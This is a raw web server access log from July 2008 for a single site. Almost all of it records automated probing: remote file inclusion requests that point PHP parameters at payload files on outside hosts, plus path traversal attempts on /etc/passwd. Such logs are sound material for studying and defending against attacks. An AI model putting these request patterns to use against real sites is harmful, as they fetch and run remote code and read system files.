195.70.36.107 - - [23/Jul/2008:05:00:08 -0700] "GET /logs/access_080711.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
195.70.36.107 - - [23/Jul/2008:05:00:08 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
195.70.36.107 - - [23/Jul/2008:05:00:09 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
211.60.155.3 - - [23/Jul/2008:05:01:05 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/dul.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.sickskins.com"
211.60.155.3 - - [23/Jul/2008:05:01:05 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/dul.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.sickskins.com"
203.22.204.188 - - [23/Jul/2008:05:01:24 -0700] "GET /logs/access.log/errors.php?error=http://jelna.as.ro/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
203.22.204.188 - - [23/Jul/2008:05:01:24 -0700] "GET /errors.php?error=http://jelna.as.ro/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
203.22.204.188 - - [23/Jul/2008:05:01:24 -0700] "GET /logs/errors.php?error=http://jelna.as.ro/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
89.111.176.84 - - [23/Jul/2008:05:01:42 -0700] "GET /logs/access.log/scan:/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://kingkool2.free.fr/ezupload/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
89.111.176.84 - - [23/Jul/2008:05:01:42 -0700] "GET /scan:/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://kingkool2.free.fr/ezupload/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
89.111.176.84 - - [23/Jul/2008:05:01:43 -0700] "GET /logs/scan:/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://kingkool2.free.fr/ezupload/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
163.17.62.3 - - [23/Jul/2008:05:01:54 -0700] "GET /logs/access.log/errors.php?error=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sickskins.com"
163.17.62.3 - - [23/Jul/2008:05:01:54 -0700] "GET /logs/access.log/errors.php?error=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sickskins.com"
163.17.62.3 - - [23/Jul/2008:05:01:54 -0700] "GET /errors.php?error=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sickskins.com"
163.17.62.3 - - [23/Jul/2008:05:01:54 -0700] "GET /errors.php?error=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sickskins.com"
163.17.62.3 - - [23/Jul/2008:05:01:55 -0700] "GET /logs/errors.php?error=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sickskins.com"
163.17.62.3 - - [23/Jul/2008:05:01:55 -0700] "GET /logs/errors.php?error=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sickskins.com"
163.17.62.3 - - [23/Jul/2008:05:01:56 -0700] "GET /logs/access.log/errors.php?error=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sickskins.com"
163.17.62.3 - - [23/Jul/2008:05:01:56 -0700] "GET /errors.php?error=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sickskins.com"
163.17.62.3 - - [23/Jul/2008:05:01:56 -0700] "GET /logs/errors.php?error=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sickskins.com"
195.70.36.107 - - [23/Jul/2008:05:02:37 -0700] "GET /logs/access_080711.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
195.70.36.107 - - [23/Jul/2008:05:02:38 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
195.70.36.107 - - [23/Jul/2008:05:02:38 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
195.70.36.107 - - [23/Jul/2008:05:02:54 -0700] "GET /logs/access_080629.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
62.212.130.170 - - [23/Jul/2008:05:03:13 -0700] "GET /logs/lib/header.php?DOC_ROOT=http://auxano.info/webcalendar/includes/js/yrec/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.sickskins.com"
62.212.130.170 - - [23/Jul/2008:05:03:17 -0700] "GET /lib/header.php?DOC_ROOT=http://auxano.info/webcalendar/includes/js/yrec/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.sickskins.com"
195.70.36.107 - - [23/Jul/2008:05:03:34 -0700] "GET /logs/access_080629.log/senetman/html/index.php?page=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
195.70.36.107 - - [23/Jul/2008:05:03:34 -0700] "GET /senetman/html/index.php?page=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
195.70.36.107 - - [23/Jul/2008:05:03:35 -0700] "GET /logs/senetman/html/index.php?page=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
195.70.36.107 - - [23/Jul/2008:05:04:01 -0700] "GET /logs/access_080611.log/errors.php?error=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
195.70.36.107 - - [23/Jul/2008:05:04:12 -0700] "GET /logs/access_080703.log/senetman/html/index.php?page=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
195.70.36.107 - - [23/Jul/2008:05:05:05 -0700] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
195.70.36.107 - - [23/Jul/2008:05:05:06 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
195.70.36.107 - - [23/Jul/2008:05:05:06 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
195.70.36.107 - - [23/Jul/2008:05:05:32 -0700] "GET /logs/access_080703.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
82.148.187.90 - - [23/Jul/2008:05:05:42 -0700] "GET //index.php?DOCUMENT_ROOT=%A0%22netcat_files%22http://www.ccvcomputer.de/cmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.sickskins.com"
82.148.187.90 - - [23/Jul/2008:05:05:42 -0700] "GET /logs//index.php?DOCUMENT_ROOT=%A0%22netcat_files%22http://www.ccvcomputer.de/cmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.sickskins.com"
65.38.180.6 - - [23/Jul/2008:05:05:48 -0700] "GET /logs/access.log/errors.php?error=http://www.brooksidefarm.com/cache/help?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sickskins.com"
65.38.180.6 - - [23/Jul/2008:05:05:48 -0700] "GET /errors.php?error=http://www.brooksidefarm.com/cache/help?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sickskins.com"
195.70.36.107 - - [23/Jul/2008:05:06:40 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
85.214.19.103 - - [23/Jul/2008:05:07:02 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.sickskins.com"
85.214.19.103 - - [23/Jul/2008:05:07:06 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.sickskins.com"
65.38.180.6 - - [23/Jul/2008:05:07:34 -0700] "GET /logs/access.log/errors.php?error=http://www.brooksidefarm.com/cache/help?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
65.38.180.6 - - [23/Jul/2008:05:07:34 -0700] "GET /errors.php?error=http://www.brooksidefarm.com/cache/help?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
65.38.180.6 - - [23/Jul/2008:05:07:34 -0700] "GET /logs/errors.php?error=http://www.brooksidefarm.com/cache/help?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
87.244.11.20 - - [23/Jul/2008:05:08:01 -0700] "GET /errors.php?error=http://www.spanishvida.com//admin/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.sickskins.com"
87.244.11.20 - - [23/Jul/2008:05:08:01 -0700] "GET /logs/errors.php?error=http://www.spanishvida.com//admin/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.sickskins.com"
204.15.10.22 - - [23/Jul/2008:05:08:07 -0700] "GET /errors.php?error=http://www.spanishvida.com//admin/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.sickskins.com"
204.15.10.22 - - [23/Jul/2008:05:08:07 -0700] "GET /logs/errors.php?error=http://www.spanishvida.com//admin/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.sickskins.com"
193.178.228.12 - - [23/Jul/2008:05:09:25 -0700] "GET /logs/errors.php?error=http://www.spanishvida.com//admin/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.sickskins.com"
193.178.228.12 - - [23/Jul/2008:05:09:25 -0700] "GET /errors.php?error=http://www.spanishvida.com//admin/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.sickskins.com"
74.52.139.226 - - [23/Jul/2008:05:09:59 -0700] "GET /logs/access.log/scan:/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://kingkool2.free.fr/ezupload/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
74.52.139.226 - - [23/Jul/2008:05:09:59 -0700] "GET /scan:/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://kingkool2.free.fr/ezupload/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
74.52.139.226 - - [23/Jul/2008:05:09:59 -0700] "GET /logs/scan:/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://kingkool2.free.fr/ezupload/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
74.52.139.226 - - [23/Jul/2008:05:11:25 -0700] "GET /logs/access_080624.log//templates/mangobery/footer.sample.php?Site_Path=http://kingkool2.free.fr/ezupload/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
203.22.204.188 - - [23/Jul/2008:05:12:22 -0700] "GET /errors.php?error=http://jelna.as.ro/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
62.212.130.170 - - [23/Jul/2008:05:12:27 -0700] "GET /environment.php?DIR_PREFIX=http://auxano.info/webcalendar/includes/js/yrec/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.sickskins.com"
62.212.130.170 - - [23/Jul/2008:05:12:27 -0700] "GET /logs/environment.php?DIR_PREFIX=http://auxano.info/webcalendar/includes/js/yrec/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.sickskins.com"
65.38.180.6 - - [23/Jul/2008:05:12:59 -0700] "GET /errors.php?error=http://www.brooksidefarm.com/cache/help?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
216.18.5.126 - - [23/Jul/2008:05:13:26 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://classyclassified.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
216.18.5.126 - - [23/Jul/2008:05:13:26 -0700] "GET //include/lib.inc.php?site_path=http://classyclassified.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
216.18.5.126 - - [23/Jul/2008:05:13:26 -0700] "GET /logs//include/lib.inc.php?site_path=http://classyclassified.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
209.163.203.50 - - [23/Jul/2008:05:13:39 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.cepeduc.com/cepa/images/M.images/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
209.163.203.50 - - [23/Jul/2008:05:13:39 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.cepeduc.com/cepa/images/M.images/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
209.163.203.50 - - [23/Jul/2008:05:13:39 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.cepeduc.com/cepa/images/M.images/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
89.111.176.84 - - [23/Jul/2008:05:13:52 -0700] "GET /logs/access_080624.log//templates/mangobery/footer.sample.php?Site_Path=http://kingkool2.free.fr/ezupload/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
209.163.203.50 - - [23/Jul/2008:05:14:02 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.cepeduc.com/cepa/images/M.images/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
209.163.203.50 - - [23/Jul/2008:05:14:02 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.cepeduc.com/cepa/images/M.images/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
209.163.203.50 - - [23/Jul/2008:05:14:02 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.cepeduc.com/cepa/images/M.images/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
209.172.55.178 - - [23/Jul/2008:05:15:01 -0700] "GET /logs/access.log/errors.php?error=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sickskins.com"
209.172.55.178 - - [23/Jul/2008:05:15:01 -0700] "GET /errors.php?error=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sickskins.com"
209.172.55.178 - - [23/Jul/2008:05:15:01 -0700] "GET /logs/errors.php?error=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sickskins.com"
91.198.175.18 - - [23/Jul/2008:05:15:03 -0700] "GET /logs/access_080705.log//templates/mangobery/footer.sample.php?Site_Path=http://kingkool2.free.fr/ezupload/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.sickskins.com"
91.198.175.18 - - [23/Jul/2008:05:15:03 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://kingkool2.free.fr/ezupload/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.sickskins.com"
209.172.55.178 - - [23/Jul/2008:05:16:29 -0700] "GET /logs/access.log/errors.php?error=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sickskins.com"
209.172.55.178 - - [23/Jul/2008:05:16:29 -0700] "GET /logs/errors.php?error=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sickskins.com"
209.172.55.178 - - [23/Jul/2008:05:16:31 -0700] "GET /errors.php?error=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sickskins.com"
217.198.149.178 - - [23/Jul/2008:05:16:45 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
62.43.197.73 - - [23/Jul/2008:05:19:06 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.fo-saverne.com/images/temp/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
62.43.197.73 - - [23/Jul/2008:05:19:07 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.fo-saverne.com/images/temp/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
74.200.202.37 - - [23/Jul/2008:05:19:21 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://growlibear.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.sickskins.com"
74.200.202.37 - - [23/Jul/2008:05:19:21 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://growlibear.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.sickskins.com"
62.43.197.73 - - [23/Jul/2008:05:19:26 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.fo-saverne.com/images/temp/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
195.70.36.107 - - [23/Jul/2008:05:19:38 -0700] "GET /logs/access_080711.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
195.70.36.107 - - [23/Jul/2008:05:19:38 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
195.70.36.107 - - [23/Jul/2008:05:19:39 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
62.43.197.73 - - [23/Jul/2008:05:19:53 -0700] "GET /logs/access_080611.log//index.php?DOCUMENT_ROOT=http://www.fo-saverne.com/images/temp/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
85.214.73.149 - - [23/Jul/2008:05:23:40 -0700] "GET /logs/access.log/?mosConfig_absolute_path=http://neu_2.lasrv-1.de/web/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sickskins.com"
85.214.73.149 - - [23/Jul/2008:05:23:40 -0700] "GET /?mosConfig_absolute_path=http://neu_2.lasrv-1.de/web/id??? HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "www.sickskins.com"
85.214.73.149 - - [23/Jul/2008:05:23:40 -0700] "GET /logs/?mosConfig_absolute_path=http://neu_2.lasrv-1.de/web/id??? HTTP/1.1" 200 1081 "-" "libwww-perl/5.803" "www.sickskins.com"
217.199.218.32 - - [23/Jul/2008:05:23:51 -0700] "GET /logs/access.log/?mosConfig_absolute_path=http://neu_2.lasrv-1.de/web/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
217.199.218.32 - - [23/Jul/2008:05:23:51 -0700] "GET /?mosConfig_absolute_path=http://neu_2.lasrv-1.de/web/id??? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.sickskins.com"
217.199.218.32 - - [23/Jul/2008:05:23:52 -0700] "GET /logs/?mosConfig_absolute_path=http://neu_2.lasrv-1.de/web/id??? HTTP/1.1" 200 1081 "-" "libwww-perl/5.805" "www.sickskins.com"
213.189.128.52 - - [23/Jul/2008:05:24:30 -0700] "GET /logs/access.log/errors.php?error=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sickskins.com"
213.189.128.52 - - [23/Jul/2008:05:24:30 -0700] "GET /errors.php?error=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sickskins.com"
213.189.128.52 - - [23/Jul/2008:05:24:30 -0700] "GET /logs/errors.php?error=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sickskins.com"
213.189.128.52 - - [23/Jul/2008:05:24:31 -0700] "GET /logs/access.log/errors.php?error=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sickskins.com"
213.189.128.52 - - [23/Jul/2008:05:24:31 -0700] "GET /errors.php?error=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sickskins.com"
213.189.128.52 - - [23/Jul/2008:05:24:32 -0700] "GET /logs/errors.php?error=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sickskins.com"
65.98.70.18 - - [23/Jul/2008:05:26:58 -0700] "GET /logs/access_080705.log//templates/mangobery/footer.sample.php?Site_Path=http://kingkool2.free.fr/ezupload/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sickskins.com"
65.98.70.18 - - [23/Jul/2008:05:26:58 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://kingkool2.free.fr/ezupload/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sickskins.com"
65.98.70.18 - - [23/Jul/2008:05:26:58 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://kingkool2.free.fr/ezupload/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sickskins.com"
209.172.55.178 - - [23/Jul/2008:05:27:07 -0700] "GET /logs/access_080611.log/errors.php?error=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sickskins.com"
80.91.189.28 - - [23/Jul/2008:05:27:21 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.cepeduc.com/cepa/images/M.images/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
80.91.189.28 - - [23/Jul/2008:05:27:22 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.cepeduc.com/cepa/images/M.images/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
80.91.189.28 - - [23/Jul/2008:05:27:23 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.cepeduc.com/cepa/images/M.images/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
209.172.55.178 - - [23/Jul/2008:05:30:38 -0700] "GET /logs/access_080611.log/errors.php?error=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sickskins.com"
209.163.203.50 - - [23/Jul/2008:05:30:49 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.cepeduc.com/cepa/images/M.images/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
209.163.203.50 - - [23/Jul/2008:05:30:49 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.cepeduc.com/cepa/images/M.images/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
209.163.203.50 - - [23/Jul/2008:05:30:49 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.cepeduc.com/cepa/images/M.images/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
209.163.203.50 - - [23/Jul/2008:05:31:03 -0700] "GET /logs/access_080711.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.cepeduc.com/cepa/images/M.images/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
209.163.203.50 - - [23/Jul/2008:05:31:05 -0700] "GET /logs/access_080711.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.cepeduc.com/cepa/images/M.images/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
209.163.203.50 - - [23/Jul/2008:05:31:17 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.cepeduc.com/cepa/images/M.images/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
209.163.203.50 - - [23/Jul/2008:05:31:17 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.cepeduc.com/cepa/images/M.images/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
209.163.203.50 - - [23/Jul/2008:05:31:17 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.cepeduc.com/cepa/images/M.images/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
74.53.240.146 - - [23/Jul/2008:05:31:48 -0700] "GET /logs/access.log/errors.php?error=http://www.latiatrini.com/tienda/tb/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sickskins.com"
